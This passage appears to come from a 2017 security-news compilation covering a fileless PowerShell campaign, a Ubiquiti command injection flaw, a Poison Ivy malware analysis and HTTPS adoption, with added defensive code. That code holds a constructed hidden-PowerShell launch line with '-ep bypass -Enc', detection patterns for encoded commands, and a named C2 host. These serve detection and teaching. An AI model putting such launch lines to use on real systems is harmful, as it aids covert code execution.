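			fmt.Printf(" [decoded: %q]", f.Decoded)
		}
		fmt.Println()
	}
}
```

The fourth record (a script run from svchost.exe with -ExecutionPolicy Bypass) is deliberately left unflagged: the rules are meant to fire on the parent-process and in-memory indicators the campaign relies on, not on every PowerShell launch. Decoding the -Enc argument matters because the IEX and New-Object calls that the third record exposes in clear text are, in the second record, hidden inside the base64.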

“In the course of our research the attacker briefly interacted with us. It was clear that a person from the other side was waiting to connect on his Meterpreter session. During the brief interaction, our researchers tried to identify the actor. The attackers immediately blocked the connection and later shut down the C&C server entirely, thereby losing their foothold in the systems of victims connected to that communication server,” Morphisec says.

The security researchers note that fileless attacks are on the rise and could prove a bigger problem than currently believed. Because the malware resides solely in memory and commands are delivered directly from the Internet, there are no executables on disk, making the attack practically invisible.


Network Layer DDoS Attacks Hit Record Levels: Imperva

17.3.2017 securityweek Attack
Distributed denial of service (DDoS) attacks continue to grow in size and sophistication, with network layer attacks reaching record levels in the fourth quarter of 2016, Imperva reports.

According to the company’s latest quarterly Global DDoS Threat Landscape Report, the emergence of powerful Internet of Things (IoT) botnets and the declining costs of DDoS-for-hire services are driving the increased threat of disruptive DDoS attacks. While network layer attacks grew in size, application layer incidents increased in frequency, the report reveals.

The largest DDoS attack mitigated by Imperva in Q4 2016 was a 650 Gbps (gigabit per second) assault fueled by the IoT botnet called Leet Botnet (in the previous quarter, Akamai dealt with a similar attack, which was fueled by the Mirai botnet). The last three months of 2016 also registered the longest network layer attack of the year, which lasted for 29 days.

During the last quarter of 2016, Imperva mitigated an average of 280 network layer attacks per week, totaling 3,603 and marking a 39.4% drop from the previous quarter. Most of the attacks were very short, with 89% of them lasting for less than one hour, the security company says.

Single-vector network attacks went up to a yearly high of 71%, while the percentage of assaults in which five or more different payloads were used dropped from 3.9% in Q3 to 1.9%.

“With respect to multi-vector attacks, the downward trend we’re seeing can likely be attributed to the increase in less-sophisticated assaults being instigated by non-professional perpetrators using botnet-for-hire services,” Imperva says.

In the October – December timeframe, Imperva mitigated 11,727 application layer attacks, for an average of 889 per week, a 2.9% increase from Q3 2016. The largest incident reached 91,209 RPS (requests per second), being significantly smaller compared to the annual high of 173,633 RPS registered in the prior three months. The longest attack lasted 47 days, but most attacks (74.7%) lasted less than an hour.

Attack frequency went up, with 58.3% of targets being hit multiple times, compared to 54.7% in Q3. Furthermore, 13.1% of sites were targeted more than ten times during the timeframe, “the highest figure ever recorded for this attack frequency category,” according to Imperva.

The quantity of sophisticated, browser-based bots that retain cookies and execute JavaScript rose to 13.6% in Q4, up from only 8.0% in Q3. “But primitive bots are still predominant and reflect the growing use of botnet-for-hire services. Over the past year, Incapsula has detected a noticeable correlation between the level of bot sophistication and attack duration,” the security firm notes.

When it comes to botnet activity in the timeframe, China emerged as the top attacking country at 78.5%, followed by Vietnam at 4.5%, and South Korea at 2.9%. The United States was the most targeted country at 56.7%, followed by the United Kingdom at 9.6% and the Netherlands at 8.6%. These numbers do not mean the actual threat actors behind the attacks are located in those countries.


Critical Flaw Exposes Many Ubiquiti Devices to Attacks

17.3.2017 securityweek Vulnerability
Dozens of products from Ubiquiti Networks are affected by a critical flaw that can be exploited to hijack devices. The security hole was reported to the vendor in November, but patches have yet to be released for most of the impacted versions.

The vulnerability, discovered by researchers at SEC Consult, has been described as a command injection in the administration interface of Ubiquiti devices. The weakness affects the pingtest_action.cgi component and it’s partly caused by the use of a very old version of PHP, namely PHP 2.0.1 from 1997.

The flaw can be exploited by authenticated attackers from a low privileged read-only account, or remotely by unauthenticated hackers if they can trick a user into clicking on a specially crafted link. The remote attack works due to the lack of cross-site request forgery (CSRF) protection, SEC Consult said in its advisory.

An attacker can exploit the vulnerability to open a reverse root shell and take over the device. Depending on what the device is used for, it may also be possible for an attacker to hijack other machines on the network.
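To show the two defects described above side by side with their fixes, here is an added example in Python; it is not Ubiquiti's code or SEC Consult's proof of concept (the real interface is PHP and its details have not been published). The handler shape, the form field names and the helpers handle_pingtest, build_ping_argv and csrf_token_valid are assumptions made for the illustration. The point is that a ping-test action needs both a per-session CSRF token, so that a crafted link cannot submit the request on the user's behalf, and an allow-list on the host value before it reaches the ping binary, passed as an argv list rather than glued into a shell string.

```python
import hmac
import ipaddress
import re
import secrets
import subprocess

# A hostname is RFC 1123 labels joined by dots: no spaces, quotes, ';', '|',
# '$', '`' or anything else a shell could interpret, and no leading '-' that
# ping would read as an option.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(?:\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$")

# Vulnerable shape of a ping-test action, shown for contrast only: the host
# string is concatenated into a shell command and nothing ties the request
# to the user's session, so both a crafted value and a crafted link work.
#     os.system("ping -c 3 " + form["host"])


def is_valid_ping_target(target) -> bool:
    """Allow-list validation: an IPv4/IPv6 literal or a plain hostname."""
    if not isinstance(target, str) or not target:
        return False
    try:
        ipaddress.ip_address(target)
        return True
    except ValueError:
        return HOSTNAME_RE.match(target) is not None


def build_ping_argv(target, count=3) -> list:
    """Return ping's argv as a list so no shell ever parses the target.
    Raises ValueError for anything outside the allow-list."""
    if not is_valid_ping_target(target):
        raise ValueError("refusing to ping %r" % (target,))
    count = int(count)                     # ValueError on non-numeric input
    if not 1 <= count <= 10:
        raise ValueError("count out of range")
    return ["ping", "-c", str(count), target]


def issue_csrf_token(session: dict) -> str:
    """Mint a per-session secret that the page embeds in its forms."""
    session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]


def csrf_token_valid(session: dict, submitted) -> bool:
    """A link a victim is tricked into clicking cannot carry this value,
    so a forged request fails here. Constant-time comparison."""
    expected = session.get("csrf_token")
    if not expected or not isinstance(submitted, str):
        return False
    return hmac.compare_digest(expected, submitted)


def handle_pingtest(session: dict, form: dict) -> dict:
    """Hardened handler: CSRF check first, then allow-list validation, then
    an argv list. Returns a dict (HTTP status plus argv or error) so it can
    be exercised offline; run_ping() does the actual execution."""
    if not csrf_token_valid(session, form.get("csrf_token")):
        return {"status": 403, "error": "missing or invalid CSRF token"}
    try:
        argv = build_ping_argv(form.get("host", ""), form.get("count", 3))
    except ValueError as exc:
        return {"status": 400, "error": str(exc)}
    return {"status": 200, "argv": argv}


def run_ping(argv: list) -> str:
    """shell=False (the default): argv entries reach execve unchanged."""
    proc = subprocess.run(argv, capture_output=True, text=True, timeout=30)
    return proc.stdout
```

The same two checks apply to any administrative action that turns user input into a process: a read-only account should never be able to reach a code path where its input is parsed by a shell, and no state-changing request should be accepted without something the browser cannot be tricked into attaching.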

According to SEC Consult, the flaw affects roughly 40 Ubiquiti access points, including Rocket Prism, PowerBeam, NanoBeam, LiteBeam, airGateway and airFiber products.

The security firm reported the vulnerability to Ubiquiti Networks on November 22 via the vendor’s HackerOne page. The company was initially responsive, but it stopped providing status updates in early February, which led to SEC Consult’s decision to make its findings public.

SEC Consult has published a video demonstrating its findings, but only limited technical details have been made available to prevent abuse.

After SEC Consult published its advisory, an Ubiquiti employee responded to users on Reddit, claiming that the company stopped responding to the researchers due to a communications issue with the HackerOne platform.

The company said the vulnerability was fixed in version 8.0.1 of AirOS, the operating system running on the affected products. It has also promised to release updates soon for versions 5.x, 6.x and 7.x.

“Agree this looks very bad, but I can assure you the optics of this aren't an accurate reflection of how security issue reports are handled,” said the Ubiquiti employee. “We did drop the ball in communication here, but it wasn't due to the issue being ignored.”


New APT Campaign based on Poison Ivy RAT with C&C in China has been reversed by MalwareMustDie
17.3.2017 securityaffairs APT

A new APT campaign based on the Poison Ivy RAT, with C&C in China, has been reversed by MalwareMustDie, who shared many interesting details about the attack vectors and the reverse-engineering techniques used.
Our journey through the excellent analysis of a fresh, insidious Chinese APT campaign.

An ordinary case of phishing?
At the beginning it seemed like the same old story: a probably infected Word document, an ordinary phishing case and nothing more.

If we look at the top of MalwareMustDie's long analysis, we see the pictures of an ordinary e-mail with the usual, boring infected Word attachment; nothing new under the sun.

What was strange was that the suspect document was hosted on a common blogging site such as Geocities, delivering a multi-layered base64-encoded VBScript which, manually decoded at the first layer, gave the result below:


Figure 1. The VBScript encoded with “powershell.exe” command.

The classic VBScript “CreateObject” instruction is followed by a PowerShell command: “powershell.exe -w hidden -ep bypass -Enc” with a long encoded string.

PowerShell? An encoded command? The “bypass” option, used for what?

Something not so “ordinary or boring” rises from the depths of the investigation, and here MalwareMustDie's analysis starts to become interesting and surprising, step after step.

Digging into the details of the functions decoded in the other layers of VBScript, in a looping process, revealed complex source code fully executable by PowerShell. We have to admit that following MalwareMustDie through the analysis is like riding a roller coaster: the same enjoyment.

Here is an example of the manually decoded base64 code, which revealed yet another nested base64-encoded layer. The functions shown in the picture are self-explanatory, as the analysis says, and it is clear that something dangerous is going on in the victim's computer.


Figure 2. The VBScript base 64 decoded code.

After several loops decoding base64 layers the result is clear: beyond the Word attachment, hidden in the VBScript file, there is a long and dangerous script ready to be executed by PowerShell. But where have we already seen this source code?
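The layer-by-layer decoding described above, automated as a triage helper. This is an added example, not code from the original post or from MalwareMustDie: it finds the blob after the -EncodedCommand switch (any of the spellings PowerShell accepts) and any argument to FromBase64String, decodes each layer (UTF-16LE for encoded commands), keeps recursing into layers that decode to script text, and leaves binary payloads as bytes without ever executing anything. The VBScript sample, the layer names and the placeholder bytes are constructed for the demonstration and are not the campaign's real dropper.

```python
import base64
import re

# Any PowerShell-accepted spelling of the -EncodedCommand switch (-e, -ec,
# -enc, -EncodedCommand, ...) followed by a base64 blob. The lookbehind keeps
# a '/' inside an earlier base64 blob from being read as a switch prefix.
ENC_SWITCH = re.compile(r"(?i)(?<!\S)[-/]e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})")
# Base64 handed to [Convert]::FromBase64String(...) inside a decoded layer.
FROM_B64 = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]{16,})['\"]\s*\)")


def _looks_like_script(text: str) -> bool:
    """Script text is printable ASCII plus line breaks; anything else is
    treated as a binary payload rather than another PowerShell layer."""
    return bool(text) and all(
        c.isascii() and (c.isprintable() or c in "\r\n\t") for c in text)


def decode_layer(blob: str):
    """Decode one base64 blob. -EncodedCommand payloads are UTF-16LE text;
    FromBase64String payloads may be text or raw bytes (the shellcode, in
    the campaign described above). Returns ('text', str) or ('bytes', bytes)."""
    raw = base64.b64decode(blob + "=" * (-len(blob) % 4))
    for codec in ("utf-16-le", "utf-8"):
        try:
            text = raw.decode(codec)
        except UnicodeDecodeError:
            continue
        if _looks_like_script(text):
            return "text", text
    return "bytes", raw


def peel(script: str, max_depth: int = 8):
    """Statically unwrap every base64 layer reachable from `script` and return
    [(depth, kind, payload), ...]. Nothing is executed: this is the manual
    layer-by-layer decoding from the analysis, automated for triage."""
    findings = []
    pending = [(0, script)]
    while pending:
        depth, text = pending.pop()
        if depth >= max_depth:
            continue
        for blob in ENC_SWITCH.findall(text) + FROM_B64.findall(text):
            try:
                kind, value = decode_layer(blob)
            except ValueError:          # not valid base64 after all
                continue
            findings.append((depth + 1, kind, value))
            if kind == "text":
                pending.append((depth + 1, value))
    return findings


def _enc(ps: str) -> str:
    """Encode text the way -EncodedCommand expects (UTF-16LE, then base64).
    Only used to build the constructed sample below."""
    return base64.b64encode(ps.encode("utf-16-le")).decode()


# Constructed sample (not the campaign's real dropper): a VBScript line that
# launches PowerShell hidden, with the execution policy bypassed and an
# encoded command, whose decoded form launches a second encoded layer, which
# in turn converts a base64 string into raw bytes. The bytes are a placeholder.
INNER_BYTES = bytes(range(0x80, 0x90))
LAYER2 = ("$sc = [Convert]::FromBase64String('%s'); Write-Host 'layer 2'"
          % base64.b64encode(INNER_BYTES).decode())
LAYER1 = "powershell.exe -w hidden -ep bypass -Enc " + _enc(LAYER2)
SAMPLE_VBS = ('CreateObject("WScript.Shell").Run '
              '"powershell.exe -w hidden -ep bypass -Enc %s", 0' % _enc(LAYER1))

if __name__ == "__main__":
    for depth, kind, payload in peel(SAMPLE_VBS):
        shown = payload if kind == "text" else "%d raw bytes, hex %s..." % (
            len(payload), payload[:8].hex())
        print("layer %d (%s): %s" % (depth, kind, shown))
```

The output of the innermost layer is deliberately kept as bytes: that is the point at which an analyst switches from reading script to disassembling or sandboxing shellcode, as the next sections of the analysis do.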

“Copy/Pasting Powersploit/CodeExecution PoC”
The code in the VBScript running the PowerShell command is a copy-paste of the infamous PowerShell-based PowerSploit/CodeExecution PoC code, which is publicly available on GitHub: same file, extension .ps1.

Here it is the main web page of the exploit with the documentation:


Figure 3. The PowerSploit / CodeExecution web page on GitHub.

The documentation of the exploit states: “Inject shellcode into the process ID of your choosing or within the context of the running PowerShell process”. Easy: this is hacking prêt-à-porter.

And here we have the first lesson learnt of this investigation: how much damage is done to the user community by keeping this malware code publicly available on GitHub. We cannot stress enough how important it would be not to have this source code ready to use.

The Shellcode analysis
But let us take a look at the shellcode, because the most important task now is to reverse it and understand the main purpose of its use: why it is injected on the victims' computers, which techniques and mechanisms it adopts, for doing what, and connecting where. The story is getting exciting!

But again the shellcode is base64-encoded: once decoded it appears as reported in the picture below:


Figure 4. The Shellcode.

The reverse engineering seems to be a long task, and again, surprisingly, we discover a great trick from MalwareMustDie for compiling the shellcode into an executable file that can be run safely:

“Saving the shellcode data in the .text section of the assembly file and the entry point (EP) will be “adjusted” by the compiler during compilation process therefore you can execute this shellcode as a binary PE file. This method is very useful when analysing shellcodes. And by using a Unix environment you can create this PE without risking an infection.”

We report the figure of the adopted process here:


Figure 5. How to handle the shellcode to build a useful .exe file

The result of this process is a “beautiful” stupid-shellcode.exe file ready to run, so that its behaviour can be understood for further investigation.

Running the malware reveals its behaviour: it extracts information from the victim's computer and calls back its C2 server, which directs all the malicious actions. Analysing the behaviour of a payload has always been fascinating, and security researchers can spend days “following the money”.

In the end it is certain that we are facing the famous, or infamous, Poison Ivy.

Poison Ivy Classical Scheme in the field
Running the shellcode, it is possible to observe that it uses many system calls involving DLLs mostly related to the system kernel. At the first stage of the assembly trace, the shellcode creates a fake process named userinit.exe, used to inject the malicious code, which is executed in this way.

Here an image from the MalwareMustDie analysis reported above:


Figure 6. The fake process userinit.exe created and injected.

MalwareMustDie's great knowledge of malware shows in all its strength: he is able to find many elements that can be traced back to Poison Ivy.

The combination of the DLLs used, he says, “is showing a typical pattern of the threat too. Moreover, the date stamped in the MUTEX name is mostly used by Poison Ivy“.

Then other operations are performed by the malware:

creating the file called “Plug1.dat”,
creating a socket for the further work,
querying PC info through “HKEY_LOCAL_MACHINE\SYSTEM\Setup”.
Yes, there is no doubt that this is Poison Ivy.

But, where is the C&C server?
The last answer needed to close the loop: where is the Command and Control server located?

If we look more closely at WS2_32.DLL we see some interesting calls such as:

socket(),
gethostbyname(),
connect().
These revealed the hostname and IP address for the callback to the Command and Control server, which is based in Seoul, Korea.


Figure 7. C&C server based in Korea.

Network/BGP Information→「61.97.243.15||4766 | 61.97.243.0/24 | KIXS-AS | KR | kisa.or.kr | KRNIC」

But looking at the hostname we see that it is web.outlooksysm.net, on which it is possible to run a WHOIS query that gives back, among other information, the Registrar: a company based in Shanghai.


Figure 8. Whois of the C&C server of the Poison Ivy malware.

Conclusion
The conclusion is that this APT campaign, which utilized multiple accounts on Geocities Japan, leading to the possibility that there is a larger APT campaign being conducted targeting Mongolian victim is

The information provided here refers to the MalwareMustDie research and analysis linked above.

This kind of campaign has been named “Free Hosting (pivoted) APT PowerSploit Poison Ivy” (FHAPPI) by the gentleman who provided us with the translation from Japanese, Mr. El Kentaro, making us very F-Happy to learn new methods and techniques.

Odisseus is an independent security researcher involved in Italy and worldwide in topics related to hacking, penetration testing, and development.


Who is spying on communications in the Washington area? A rogue state is suspected of mass surveillance
17.3.2017 securityaffairs BigBrothers

US authorities uncovered a surveillance activity allegedly powered by a rogue entity that is tracking phones of Government officials and foreign diplomats.
Something very strange has happened in the Washington, D.C., region, experts noticed an unusual amount of highly suspicious cellphone activity. The fear is that a rogue actor is attempting to spy on communications of numerous individuals, including US Government officials and foreign diplomats.

The news was reported by the Washington Free Beacon who viewed sensitive documents regarding the issue and interviewed security insiders. The level of sophistication of the attacks suggests the involvement of a foreign nation-state actor.

“The authorities observed a large spike in suspicious activity on a major U.S. cellular carrier, which has raised red flags in the Department of Homeland Security and prompted concerns that cellphones in the region are being tracked,” reads the article published by the Free Beacon. “Such activity could allow pernicious actors to clone devices and other mobile equipment used by civilians and government insiders, according to information obtained by the Free Beacon.”

According to the Free Beacon, attackers siphoned a huge amount of location data from a U.S. cellular carrier, which allowed control of several cell phone towers in the area.


The activity was spotted by a program known as ESD Overwatch that monitors cell towers activities for anomalies, the software is supported by DHS and ESD America.

According to a report prepared by ESD Overwatch, a contractor working on behalf of DHS, the data gathered by the ESD Overwatch program shows the U.S. cell carrier has experienced “unlawful access to their network for the purpose of large scale subscriber tracking.”

“Cell phone information gathered by the program shows major anomalies in the D.C.-area indicating that a third-party is tracking en-masse a large number of cellphones. Such a tactic could be used to clone phones, introduce malware to facilitate spying, and track government phones being used by officials in the area.” continues the Free Beacon.

“The attack was first seen in D.C. but was later seen on other sensors across the USA,” according to one source familiar with the situation. “A sensor located close to the White House and another over near the Pentagon have been part of those that have seen this tracking.”

The threat actor is trying to identify and track cellphones when they connect to cellphone towers. The DHS’s Office of Public Affairs confirmed that the ESD Overwatch program was used in a 90-day pilot program that began Jan. 18.

There is also another disconcerting aspect of the story: is this the first time a threat actor has launched a similar surveillance campaign?

According to the Free Beacon, there is no answer to this question; “before the [ESD Overwatch program] surveillance program was initiated the federal government did not have a method to detect intrusions of the nature seen over the past several months.”

An official with ESD Overwatch confirmed the existence of the DHS program.

The surveillance of US cellular communication has been a top concern in Congress, lawmakers petitioned DHS on Wednesday to have information on the countermeasures in place to prevent foreign threat actors from spying on communications.


The number of encrypted websites is growing, HTTPS is finally replacing HTTP

17.3.2017 SecurityWorld Security
After Edward Snowden revealed to the world that online communication is being mass-collected and stored by some of the world's most powerful intelligence agencies, security experts began calling for stronger encryption across the entire web. Four years later, it seems their effort has succeeded.

The number of websites supporting HTTPS – that is, the HTTP protocol encrypted over an SSL/TLS connection – has increased significantly over the past year. Turning on encryption brings many benefits, so if your website does not yet support this technology, it is time to change that.

Recent telemetry data from Google Chrome and Mozilla Firefox shows that over 50% of transferred web data is encrypted, both on desktop computers and on mobile devices. It is true that most of that traffic belongs to a handful of the largest websites, yet a jump of 10 percentage points in a year is respectable.

A Tuesday survey of the world's one million most visited websites showed that 20% of them support HTTPS, compared to 14% in August. That is a considerable increase of more than 40% in half a year.

There are many reasons for the accelerated adoption of the HTTPS standard. Some of the earlier obstacles are now easier to overcome, prices have dropped, and the number of reasons to switch to encryption has grown.

Performance impact

One of the long-standing concerns about HTTPS has been its negative impact on server resources and page load times. Encryption usually brings a speed penalty, so why should HTTPS be any different?

As it turns out, thanks to improvements on both the server side and in client software, the impact of TLS encryption on web speed is minimal.

When Google started using HTTPS for its Gmail e-mail client in 2010, the company found only a one percent increase in CPU load on its servers, under 10 KB of additional memory overhead per connection, and less than 2% network overhead overall. The switch to encryption required no additional machines or specialized hardware.

Not only is the impact on the back end minimal, but browsing websites is actually faster when HTTPS is enabled. The reason is that modern browsers support HTTP/2, a revision of the HTTP protocol that brings many performance improvements.

Although encryption is not required by the official HTTP/2 specification, browser makers have made it mandatory in their own implementations. So if you want the speed improvements of HTTP/2 on your website, encryption is a necessity.

Of course, it is also about money

The cost of obtaining and renewing the digital certificates needed to deploy and run HTTPS was a legitimate concern in the past. Many small businesses and non-commercial entities probably decided against deploying encryption for precisely this reason, and even larger companies managing many websites and domains may have feared the financial impact.

Fortunately, this should no longer be a problem, at least for sites that do not require Extended Validation (EV) certificates. Last year the non-profit organization Let’s Encrypt launched domain validation (DV) certificates, which it moreover provides free of charge through a fully automated and simple process.

From a cryptographic and security standpoint there is no difference between DV and EV certificates. The only real difference is that EV requires more thorough verification of the organization and allows the certificate holder to display the owner's name in the address bar, next to the visual indicator of the HTTPS connection.

Besides Let’s Encrypt, there are several network and cloud service providers, including CloudFlare and Amazon, that offer TLS certificates for free. Websites hosted on the WordPress service also get HTTPS automatically, even if they use a custom domain.

Poor implementation is the nightmare

Deploying HTTPS used to be very complicated. Because of poor documentation, continued support for weak algorithms in cryptographic libraries, and constantly discovered new attacks, there was a high chance that server administrators would end up with a vulnerable version of the HTTPS protocol. And bad HTTPS is worse than none, because it gives users a false sense of security.

Many of these problems are being solved, however. Websites such as Qualys SSL Labs provide free documentation on TLS, as well as testing tools for finding misconfigurations and vulnerabilities in a user's HTTPS deployment. Other websites provide resources on optimizing TLS performance.

Mixed content remains a problem

Sending and pulling external resources such as images, videos, and JavaScript code over unencrypted connections into an HTTPS website triggers security warnings in the user's browser. And because many websites depend on external resources – forums, web analytics, advertisements, and so on – mixed content remains one of the reasons why some website owners have still not moved to HTTPS.

The good news is that in recent years a large number of third-party services, including advertising networks, have started supporting HTTPS. Evidence that the problem is no longer as significant as before is, for example, that many online media outlets have already switched to HTTPS, even though such sites are usually dependent on advertising revenue. Still, some owners have no choice but to stay on HTTP for financial reasons.

Webmasters can use the CSP header, which reveals insecure external resources on their websites and lets them, for example, block those resources. HTTP Strict Transport Security (HSTS) can also help with mixed content problems, as security analyst Scott Helme explains (in English).

Other options include services such as CloudFlare, which acts as a proxy between the user and the web server that actually hosts the website. CloudFlare encrypts data transfer between end users and its proxy server, even if the connection between the proxy and the hosting servers is unencrypted. This secures only half of the communication between the parties, but it is still better than nothing and partially prevents manipulation or eavesdropping of the incoming content.
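As an added example (not code from the article or from any of the services it mentions), here is a small mixed-content scanner together with the response headers that address the problem, using only the Python standard library. The sample page, the host names in it and the /csp-report endpoint are constructed for the demonstration. It goes slightly beyond the article by also checking srcset candidates and form actions, and by showing a report-only CSP, which reports insecure fetches without changing anything for the user, next to the enforcing upgrade-insecure-requests directive and an HSTS header.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Tag/attribute pairs that fetch a subresource. An http:// value in one of
# these on an HTTPS page is mixed content; <a href> only navigates, so it is
# deliberately not listed.
SUBRESOURCE_ATTRS = {
    "script": ("src",), "img": ("src", "srcset"), "link": ("href",),
    "iframe": ("src",), "video": ("src", "poster"), "audio": ("src",),
    "source": ("src", "srcset"), "object": ("data",), "embed": ("src",),
    "form": ("action",),
}


class MixedContentScanner(HTMLParser):
    """Collects (tag, attribute, url) for every http:// subresource."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        watched = SUBRESOURCE_ATTRS.get(tag, ())
        for name, value in attrs:
            if name not in watched or not value:
                continue
            # srcset holds comma-separated "url descriptor" candidates.
            if name == "srcset":
                urls = [c.strip().split()[0] for c in value.split(",") if c.strip()]
            else:
                urls = [value.strip()]
            for url in urls:
                # Protocol-relative URLs (//host/...) inherit https and pass.
                if urlsplit(url).scheme.lower() == "http":
                    self.findings.append((tag, name, url))


def find_mixed_content(html: str):
    """Return the mixed-content findings for one HTML document."""
    scanner = MixedContentScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


def hardening_headers(report_only: bool = False, report_uri: str = "/csp-report") -> dict:
    """Headers an HTTPS deployment sends once the page itself is fixed.
    Enforcing mode: upgrade-insecure-requests makes the browser rewrite
    http:// subresource URLs to https:// before fetching them. Report-only
    mode changes nothing for the user but reports every non-https fetch to
    report_uri, a safe first step on a large site. HSTS then stops the
    browser from ever starting with plain HTTP for this host."""
    if report_only:
        header = ("Content-Security-Policy-Report-Only",
                  "default-src https: data: 'unsafe-inline' 'unsafe-eval'; "
                  "report-uri " + report_uri)
    else:
        header = ("Content-Security-Policy", "upgrade-insecure-requests")
    return {
        header[0]: header[1],
        "Strict-Transport-Security": "max-age=31536000; includeSubDomains",
    }


# Constructed sample page: two HTTPS resources, three HTTP subresources,
# one protocol-relative frame (inherits https) and one plain HTTP link.
SAMPLE_HTML = """<html><head>
<link rel="stylesheet" href="https://static.example.com/site.css">
<script src="http://cdn.example.net/analytics.js"></script>
</head><body>
<a href="http://partner.example.org/">partner</a>
<img src="https://static.example.com/logo.png"
     srcset="https://static.example.com/logo.png 1x, http://static.example.com/logo@2x.png 2x">
<iframe src="//ads.example.net/frame"></iframe>
<img src="http://images.example.org/banner.jpg" alt="banner">
</body></html>"""

if __name__ == "__main__":
    for tag, attr, url in find_mixed_content(SAMPLE_HTML):
        print("mixed content: <%s %s=%s>" % (tag, attr, url))
    for name, value in hardening_headers().items():
        print("%s: %s" % (name, value))
```

Run the scanner over rendered pages first, roll out the report-only header to catch resources added by scripts at runtime, and switch to the enforcing header only when the reports are clean; HSTS with a long max-age should be the last step, because it cannot be undone quickly if some subdomain still needs plain HTTP.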

HTTPS adds credibility

One of the key advantages of HTTPS is protecting users from man-in-the-middle (MitM) attacks, which can be launched from poorly secured or compromised networks.

Hackers use this technique to steal a user's sensitive information or to inject malicious content into the transmitted data. MitM attacks can also be carried out from higher up in the Internet infrastructure, for example at the national level – the Great Firewall of China – or even at the continental level, as in the case of the NSA's eavesdropping activities.

Operators of Wi-Fi hotspots, and even some Internet service providers, use MitM techniques to inject advertisements and various messages into users' unsecured data transfers.

Don't want HTTPS? You'll be penalized

Google began favoring HTTPS in its search results as early as 2014; this means that encrypted sites have an advantage in search over standard HTTP pages. The emphasis placed on encryption in the results is relatively small for now, but Google wants to increase it in the future as part of its support for the HTTPS protocol.

Browser makers are fighting for the same cause, but somewhat more aggressively. New versions of Chrome and Firefox display a warning when users try to enter a password or credit card information into text fields outside of an HTTPS page.

In Chrome, unencrypted sites are even barred from accessing some features such as geolocation, GPS devices, or the cache. In the future Google wants to go even further with Chrome, for example displaying a “Not secure” warning in the address bar for all unencrypted sites.

The future of HTTPS

“As a community, I feel we have done a lot of good in this area and explained why everyone should use HTTPS,” says Ivan Ristic, former head of Qualys SSL Labs and author of the book Bulletproof SSL and TLS. “Browsers in particular, with their constant improvements, are an important motive for switching to HTTPS.”

According to Ristic, some problems remain, such as legacy systems or third-party services without HTTPS support. He feels, however, that the situation is improving on the side of the general public, which is pushing for HTTPS adoption.

“I feel that as more sites move to encryption, everything will become easier,” he says.

People have a higher level of confidence and trust when using HTTPS websites. However, certificates are now easy to obtain, and many attackers take advantage of users' often misplaced trust and set up purely malicious HTTPS sites.

“When it comes to the question of trust, one of the things I have to emphasize is that HTTPS says nothing about the trustworthiness of a website or about who owns it,” says security expert Troy Hunt.

Organizations will have to come to terms with abuse of the HTTPS protocol and start inspecting data transfers on local networks, because an encrypted connection can hide unwanted malware.


Sony Is Working On Mobile-to-Mobile Wireless Charging Technology
17.3.2017 thehackernews IT

So you are in a party with your friends, and your phone is running low on battery. Oops!
The ideal solution is to charge your phone using a charger or a power bank, but not everyone carries power banks or chargers with them all the time, especially in a party.
What if you can charge your phone wirelessly using another phone when it runs out of battery?
Isn't that great? Well, thanks to Sony, you might soon be able to use your friends’ phones to charge your own device.
According to a recently published patent application, Sony is working on a new futuristic technique that enables wireless power exchange between various nearby consumer electronic devices, including smartphones, computers, microwave, washing machine, fridges, and TVs, without cords.
Wireless charging isn't a new concept at all, but this is the first time when the Near Field Communications (NFC) technology is being used for power transfer wirelessly between two devices, that too over considerable distances.
NFC is a technology that allows data transfer over a short-range, which is why two devices have to be placed nearby, under a certain distance, for the given wireless technology to work.
Titled "Configuration of Data and Power Transfer in Near Field Communications," the patent describes how any consumer electronic device with an NFC chip might be able to search for other devices with the same technology and connect with them to transfer power, the same way a device searches for available Wi-Fi hotspots.
However, the patent doesn’t detail how well this technology would actually work and says nothing about the distance over which it might work between two devices.
"The distances over which the wireless communication can be achieved is typically consistent with distances used for wireless electrical power transfer through the power transfer antenna," Sony's patent document reads.
The patent also does not specify that these devices would necessarily be smartphones or computers; instead, it uses the term "portable consumer electronic device," which could be a fridge, TV, computer, microwave, washing machine, and so on.
This technology could eliminate one of your worst pains of always carrying out bulky power banks and multiple charging cables, provided your friends or smart appliances are willing to share their battery power to charge your phone.
However, patenting an idea does not necessarily mean we will ever see it come to life, but if it succeeds, your phone will automatically start charging when you walk into a room, thanks to smart TVs, microwaves and other NFC-enabled devices.


Welcome to Pwn2Own 2017 – Researchers hacked Adobe Reader, Edge, Ubuntu, and Safari
17.3.2017 securityaffairs Congress

Pwn2Own 2017 has started and, as usual, it is a great event to see hackers at work. On the first day, experts hacked Edge, Safari, Ubuntu, and Adobe Reader.
The Pwn2Own 2017 competition, held in Vancouver (Canada), has started and, as usual, it is a great event to see hackers at work. On the first day, bug bounty hunters managed to hack Microsoft Edge, Safari, Ubuntu, and Adobe Reader.


This is the 10th anniversary of the Pwn2Own hacking contest, it was arranged by Trend Micro and the Zero Day Initiative (ZDI) that introduced new exploit categories.

11 groups vie for a prize pool of $1 million; the products to hack are organized into five categories: virtual machine (VM) escapes, web browsers and plugins, local privilege escalation, enterprise applications, and server side.

On the first day, the participants earned a total of $233,000 for the exploits they disclosed.

The day started with the success of the researcher @mj0011sec from the Chinese security firm Qihoo360, who earned $50,000 for hacking Adobe Reader on Windows, winning 6 points towards Master of Pwn for his team.

The hacker and his team exploited a jpeg2000 heap overflow in Adobe Reader, a Windows kernel info leak, and an RCE through an uninitialized buffer in the Windows kernel to take down Adobe Reader. In the process, they earned themselves $50,000 USD and 6 points towards Master of Pwn.

Zero Day Initiative (@thezdi), 7:53 PM - 15 Mar 2017: “Boom! @mj0011sec uses 1 #Adobe and 2 #Windows bugs to take down #Reader & earn $50K. Next up is #Safari. http://bit.ly/2mJMrpl #P2O”
Adobe Reader was also successfully hacked by members of Team Sniper from Tencent Security. The hackers exploited use-after-free and information disclosure flaws to achieve code execution, and a use-after-free in the kernel to obtain SYSTEM-level permissions. The team earned $25,000 for its exploits and 6 Master of Pwn points.

